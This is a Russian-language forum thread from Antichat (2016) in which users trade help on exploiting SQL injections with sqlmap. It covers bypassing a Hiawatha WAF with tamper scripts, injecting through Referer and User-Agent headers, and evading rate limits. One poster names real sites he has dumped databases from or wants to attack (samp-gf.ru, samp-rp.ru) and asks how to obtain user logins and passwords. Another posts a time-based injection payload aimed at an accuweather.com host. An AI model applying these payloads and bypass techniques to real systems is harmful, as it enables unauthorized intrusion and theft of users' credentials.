HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 18.11.2016, 16:25
3acuson
Новичок
Регистрация: 31.01.2010
Сообщений: 18
С нами: 8566628

Репутация: 0
По умолчанию

на сервере стоит Hiawatha Webserver. Как обойти его WaF в мапе, какие тамперы можно задействовать?

касается этой уязвимости http://www.securityfocus.com/bid/92687/info

крутит только MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause но таблицы выдернуть не может
 
Ответить с цитированием

  #2  
Старый 19.11.2016, 18:05
t0ma5
Постоянный
Регистрация: 10.02.2012
Сообщений: 830
С нами: 7502006

Репутация: 90


По умолчанию

Цитата:
Сообщение от 3acuson  

на сервере стоит Hiawatha Webserver. Как обойти его WaF в мапе, какие тамперы можно задействовать?
касается этой уязвимости
http://www.securityfocus.com/bid/92687/info
крутит только MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause но таблицы выдернуть не может
надо узнать почему не может, доступ к information_schema есть? дебаг запросов юзал?
 
Ответить с цитированием

  #3  
Старый 19.11.2016, 20:45
3acuson
Новичок
Регистрация: 31.01.2010
Сообщений: 18
С нами: 8566628

Репутация: 0
По умолчанию

дебаг пишет [DEBUG] got HTTP error code: 441 (SQL Injection Detected) почти на все.

пропускает запросы типа 1 RLIKE (SELECT (CASE WHEN (9434=9434) THEN 1 ELSE 0x28 END))

возвращает ноль при запросе к счема.таблес
 
Ответить с цитированием

  #4  
Старый 19.11.2016, 21:17
t0ma5
Постоянный
Регистрация: 10.02.2012
Сообщений: 830
С нами: 7502006

Репутация: 90


По умолчанию

Цитата:
Сообщение от 3acuson  

дебаг пишет [DEBUG] got HTTP error code: 441 (SQL Injection Detected) почти на все.
пропускает запросы типа 1 RLIKE (SELECT (CASE WHEN (9434=9434) THEN 1 ELSE 0x28 END))
возвращает ноль при запросе к счема.таблес
да похоже на waf, "441 (SQL Injection Detected) почти на все" почти на всё, но получается не на всё, возможно слово from его смущает, попробуй запрос отправить что то типа "select 1 from 1"

к information_schema вероятно поэтому же доступа нет
 
Ответить с цитированием

  #5  
Старый 22.11.2016, 19:37
NiggaVlg34
Новичок
Регистрация: 22.11.2016
Сообщений: 1
С нами: 4986326

Репутация: 0
По умолчанию

Подскажите пожалуйста как узать команду --os-bof?

Я все делаю с телефона. Скачал себе metasploit framework через терминал GNURoot Debian как требовал sqlmap, но при выполнении запроса с командой --os-bof он все-равно требует наличие метасплоита. Как решить эту проблему? Или может надо сплоит закинуть в папку какую то?

И еще вопрос можно ли как то получить логины и пароли к ЛК на этом сайте samp-gf.ru?

Сдампил БД через эту узвимость http://samp-gf.ru/download.php?id=3' , но ничего толкового не нашел в таблицах.

И вот на этом сайте samp-rp.ru можно что нибудь сделать, я вроде ничего похожего на соль не нашел.
 
Ответить с цитированием

  #6  
Старый 23.11.2016, 17:45
RWD
Участник форума
Регистрация: 25.04.2013
Сообщений: 153
С нами: 6868406

Репутация: 2
По умолчанию

привет

как вот такое крутить в sqlmap

Request

GET /authenticate.php HTTP/1.1

Referer: if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(no w()=sysdate(),sleep(0),0))OR"*/

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21

X-Requested-With: XMLHttpRequest

Host: wwwl.accuweather.com

Connection: Keep-alive

Accept-Encoding: gzip,deflate

Accept: */*

HTTP/1.1 302 Found

Date: Wed, 23 Nov 2016 12:55:50 GMT

Server: Apache/2.4.6 (Red Hat Enterprise Linux) OpenSSL/1.0.1e-fips PHP/5.4.16

X-Powered-By: PHP/5.4.16

Location: error.php?url=&mt=

Content-Length: 43

Keep-Alive: timeout=5, max=64

Connection: Keep-Alive

Content-Type: text/html; charset=UTF-8
 
Ответить с цитированием

  #7  
Старый 23.11.2016, 17:50
BabaDook
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
С нами: 5797046

Репутация: 40


По умолчанию

Цитата:
Сообщение от RWD  

привет
как вот такое крутить в sqlmap
Request
GET /authenticate.php HTTP/1.1
Referer: if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(no w()=sysdate(),sleep(0),0))OR"*/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
X-Requested-With: XMLHttpRequest
Host: wwwl.accuweather.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*
HTTP/1.1 302 Found
Date: Wed, 23 Nov 2016 12:55:50 GMT
Server: Apache/2.4.6 (Red Hat Enterprise Linux) OpenSSL/1.0.1e-fips PHP/5.4.16
X-Powered-By: PHP/5.4.16
Location: error.php?url=&mt=
Content-Length: 43
Keep-Alive: timeout=5, max=64
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
cкулмап -у site/authenticate.php --хедер'реферер*'
 
Ответить с цитированием

  #8  
Старый 23.11.2016, 19:26
Mister_Bert0ni
Участник форума
Регистрация: 10.05.2015
Сообщений: 142
С нами: 5795606

Репутация: 57
По умолчанию

.SpoilerTarget" type="button">Spoiler: Список_параметров_для_фазз нга
--level=2 // фазит Cookie header

--level=3 // фазит User-Agent header, и Refererзаголовки

--level=5 // фазит Host header
Ну а в твоем случае,так как написали Выше

Используй астерикс (*)

--user-agent="sqlmap*" // тест иньекции в user-agent

--referer="target.com*" //тест иньекци в referer

--headers="User-Agent:test*\nReferer:bla" // Тоже самое что и --referer="blas" --user-agent="pipiska*"

--headers="MegaHeader= BigPipiska*" // Поиск скули в заголовке MegaHeader

Или же просто поставь астерикс(*) в нужном месте для иньекции в твоем request.txt

-r request.txt
 
Ответить с цитированием

  #9  
Старый 25.11.2016, 03:08
passwd
Познающий
Регистрация: 23.12.2010
Сообщений: 78
С нами: 8098166

Репутация: 5
По умолчанию

Подскажите почему так происходит и как это можно обойти.

Начал раскручивать /page.aspx?id=1

Вот так выглядел запрос:

Код:
--random-agent --time-sec 20
Ответ "connection timed out", даже если добавить --hpp



Затем попробовал добавить tamper:

Код:
--hpp --tamper=charunicodeencode,percentage,chardoubleencode --random-agent --time-sec 20
В итоге "500 internal server error":

.SpoilerTarget" type="button">Spoiler: Image with --tamper


Затем, после десяток попыток и экспериментов с разными запросами, оно всё же получило свой payload и отобразило --current-db. При чем без прописывания --tamper или --hpp. Вот что показал --banner.

.SpoilerTarget" type="button">Spoiler: Image --banner


Но вся проблема теперь состоит в том, что не хочет отображать таблицы.

Код:
-D *** --tables
.SpoilerTarget" type="button">Spoiler: Image --tables

Количество таблиц определяет, но имена не хочет. Вот как реагирует если добавить --hpp --parse-errors:

.SpoilerTarget" type="button">Spoiler: Image --hpp --parse-errors

Та же проблема если использовать --common-tables:

.SpoilerTarget" type="button">Spoiler: Image --common-tables


Как такое можно обойти?
 
Ответить с цитированием

  #10  
Старый 25.11.2016, 13:59
t0ma5
Постоянный
Регистрация: 10.02.2012
Сообщений: 830
С нами: 7502006

Репутация: 90


По умолчанию

Цитата:
Сообщение от passwd  

Подскажите почему так происходит и как это можно обойти.
Начал раскручивать /page.aspx?id=1
Вот так выглядел запрос:
Код:
--random-agent --time-sec 20
Ответ "connection timed out", даже если добавить --hpp

Затем попробовал добавить tamper:
Код:
--hpp --tamper=charunicodeencode,percentage,chardoubleencode --random-agent --time-sec 20
В итоге "500 internal server error":
Spoiler: Image with --tamper

Затем, после десяток попыток и экспериментов с разными запросами, оно всё же получило свой payload и отобразило --current-db. При чем без прописывания --tamper или --hpp. Вот что показал --banner.
Spoiler: Image --banner

Но вся проблема теперь состоит в том, что не хочет отображать таблицы.
Код:
-D *** --tables
Spoiler: Image --tables

Количество таблиц определяет, но имена не хочет. Вот как реагирует если добавить --hpp --parse-errors:
Spoiler: Image --hpp --parse-errors

Та же проблема если использовать --common-tables:
Spoiler: Image --common-tables

Как такое можно обойти?
если оно само заработало, может на сервере ограничение запросов в минуту например?

попробуй --delay=2 выставить, ну попытка не пытка
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.